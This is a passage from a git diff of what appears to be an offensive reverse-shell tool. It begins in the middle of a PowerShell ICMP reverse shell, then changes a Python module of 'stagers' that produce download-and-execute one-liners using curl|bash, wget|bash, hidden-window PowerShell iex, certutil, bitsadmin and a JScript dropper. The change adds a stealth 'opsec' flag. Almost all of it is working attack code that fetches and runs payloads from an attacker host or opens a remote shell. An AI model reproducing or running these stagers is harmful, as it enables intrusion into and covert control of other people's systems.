$BufferSize + if ($remainingindex -ne 0) + { + $sendbytes2 = $sendbytes[($i*$BufferSize)..($sendbytes.Length)] + $ICMPClient.Send($IPAddress,60 * 10000, $sendbytes2, $PingOptions) | Out-Null + } + } + else + { + $ICMPClient.Send($IPAddress,60 * 10000, $sendbytes, $PingOptions) | Out-Null + } + $sendbytes = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ') + $ICMPClient.Send($IPAddress,60 * 1000, $sendbytes, $PingOptions) | Out-Null + } + else + { + Start-Sleep -Seconds $Delay + } + } +} +Invoke-PowerShellIcmp -IPAddress TARGET""" diff --git a/src/stagers.py b/src/stagers.py index ca3a5fa..ee8baa0 100644 --- a/src/stagers.py +++ b/src/stagers.py @@ -5,6 +5,7 @@ from SocketServer import TCPServer from socket import * + class HTTPServer(object): def __init__(self, port): self.port = port @@ -14,7 +15,7 @@ def check_port(self): We probe this port, to check if it is available. """ sock = socket(AF_INET, SOCK_STREAM) - sock.settimeout(3.0) # maximum delay + sock.settimeout(3.0) # maximum delay try: sock.connect(('', self.port)) sock.close() @@ -32,9 +33,9 @@ def start(self): class HTTPStager(object): def __init__(self): - self.name = None self.payload = None self.args = None + self.opsec = False # Set to true if it is stealth (hides windows or processes) def get(self): """ @@ -54,74 +55,110 @@ def get(self): # It must refer to HTTP port and not a shell handler port. class Python_HTTP_Stager(HTTPStager): name = "Python HTTP Stager" + def __init__(self, conn_info, args, filename): + HTTPStager.__init__() self.args = args self.host = conn_info[0] self.port = conn_info[1] - self.payload = """python -c "from requests import get;import os;os.system(get('http://{0}:{1}/{2}').text)" """.format(self.host, - self.port, filename) - + self.payload = """python -c "from requests import get;import os;os.system(get('http://{0}:{1}/{2}').text)" """.format(self.host, self.port, filename) + + class Perl_HTTP_Stager(HTTPStager): name = "Perl HTTP Stager" + def __init__(self, conn_info, args, filename): - self.args = args + HTTPStager.__init__(self) + self.args = args self.host = conn_info[0] self.port = conn_info[1] self.payload = """perl -e 'use LWP::UserAgent;my $u=new LWP::UserAgent;my $d="http://{0}:{1}/{2}";my $req=new HTTP::Request("GET", $d);my $res=$u->request($req);my $c=$res->content();system $c' """.format(self.host, - self.port, filename) + self.port, + filename) + class Wget_HTTP_Stager(HTTPStager): name = "Wget HTTP stager" + def __init__(self, conn_info, args, filename): - self.args = args + HTTPStager.__init__(self) + self.args = args self.host = conn_info[0] self.port = conn_info[1] self.payload = """wget http://{0}:{1}/{2} -O - |bash -p""".format(self.host, self.port, filename) + class Curl_HTTP_Stager(HTTPStager): name = "cURL HTTP stager" + def __init__(self, conn_info, args, filename): - self.args = args + HTTPStager.__init__(self) + self.args = args self.host = conn_info[0] self.port = conn_info[1] self.payload = """curl http://{0}:{1}/{2} |bash -p""".format(self.host, self.port, filename) + class Powershell_HTTP_Stager(HTTPStager): - name = "Powershell HTTP Stager" + name = "Powershell cmd.exe HTTP Stager" + def __init__(self, conn_info, args, filename): - self.args = args + HTTPStager.__init__(self) + self.args = args self.host = conn_info[0] self.port = conn_info[1] - self.payload = """powershell.exe -nop -ep bypass -Command $x=new-object net.webclient;$x.proxy=[Net.WebRequest]::GetSystemWebProxy();$x.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iex $x.downloadString('http://{0}:{1}/{2}') """.format(self.host, - self.port, filename) + self.opsec = True + self.payload = """powershell.exe -nop -w hidden -ep bypass -Command $x=new-object net.webclient;$x.proxy=[Net.WebRequest]::GetSystemWebProxy();$x.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$p=$x.downloadString('http://{0}:{1}/{2}');cmd.exe /c $p """.format(self.host, self.port, filename) + + +class PurePowershell_HTTP_Stager(HTTPStager): + name = "Pure Powershell HTTP Stager" + + def __init__(self, conn_info, args, filename): + HTTPStager.__init__(self) + self.args = args + self.host = conn_info[0] + self.port = conn_info[1] + self.opsec = True + self.payload = """powershell.exe -nop -w hidden -ep bypass -Command $x=new-object net.webclient;$x.proxy=[Net.WebRequest]::GetSystemWebProxy();$x.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;iEx $x.downloadString('http://{0}:{1}/{2}') """.format(self.host, self.port, filename) + class Certutil_HTTP_Stager(HTTPStager): name = "CertUtil Windows HTTP Stager" + def __init__(self, conn_info, args, filename): - self.args = args + HTTPStager.__init__(self) + self.args = args self.host = conn_info[0] self.port = conn_info[1] - self.payload = """cmd.exe /c "certutil -urlcache -split -f http://{0}:{1}/{2} {2}.bat && cmd.exe /c {2}.bat" """.format(self.host, - self.port, filename) + self.payload = """cmd.exe /c "certutil -urlcache -split -f http://{0}:{1}/{2} {2}.bat && start /b cmd.exe /c {2}.bat" """.format(self.host, self.port, filename) + class BitsAdmin_HTTP_Stager(HTTPStager): name = "BitsAdmin Windows HTTP Stager" + def __init__(self, conn_info, args, filename): + HTTPStager.__init__(self) self.args = args self.host = conn_info[0] self.port = conn_info[1] - self.payload = """cmd.exe /c "bitsadmin.exe /transfer {0} /download /priority normal http://{1}:{2}/{3} %Temp%\\{3}.bat && cmd.exe /c %Temp%\\{3}.bat" """.format(generate_file_name(), self.host, - self.port, filename) + self.payload = """cmd.exe /c "bitsadmin.exe /transfer {0} /download /priority normal http://{1}:{2}/{3} %Temp%\\{3}.bat && start /b cmd.exe /c %Temp%\\{3}.bat" """.format(generate_file_name(), + self.host, self.port, + filename) + -class VBScript_HTTP_Stager(HTTPStager): +class VbScriptHttpStager(HTTPStager): name = "VBScript Windows HTTP Stager" + def __init__(self, conn_info, args, filename): + HTTPStager.__init__(self) self.args = args self.host = conn_info[0] self.port = conn_info[1] - self.payload = """cmd.exe /c "echo var H = new ActiveXObject("WinHttp.WinHttpRequest.5.1");H.Open("GET", "http://{0}:{1}/{2}", /*async=*/false);H.Send();B = new ActiveXObject("ADODB.Stream");B.Type = 1;B.Open();B.Write(H.ResponseBody);B.SaveToFile("{2}.bat");S = new ActiveXObject("Wscript.Shell");S.run("{2}.bat");" > {2}.js && cmd.exe /c "cscript {2}.js" """.format(self.host, self.port, filename) + self.payload = """start /wait /b cmd.exe /c echo var H = new ActiveXObject("WinHttp.WinHttpRequest.5.1");H.Open("GET", "http://{0}:{1}/{2}", /*async=*/false);H.Send();B = new ActiveXObject("ADODB.Stream");B.Type = 1;B.Open();B.Write(H.ResponseBody);B.SaveToFile("{2}.bat"); > {2}.js && cscript {2}.js && {2}.bat""".format(self.host, self.port, filename) + def choose_stager(stagers): """ @@ -152,10 +189,12 @@ def choose_stager(stagers): print("\n") # Loop through each of them. for stager in stagers: - if stager[0] == n: # if (n-1) is the chosen number. - return stager[1] # return HTTPStager object. + if stager[0] == n: # if (n-1) is the chosen number. + return stager[1] # return HTTPStager object. # These are going to be passed as available stagers in bin/shellpop + + LINUX_STAGERS = [ (1, Python_HTTP_Stager), (2, Perl_HTTP_Stager), @@ -167,5 +206,5 @@ def choose_stager(stagers): (1, Powershell_HTTP_Stager), (2, Certutil_HTTP_Stager), (3, BitsAdmin_HTTP_Stager), - (4, VBScript_HTTP_Stager) + (4, VbScriptHttpStager) ] \ No newline at end of file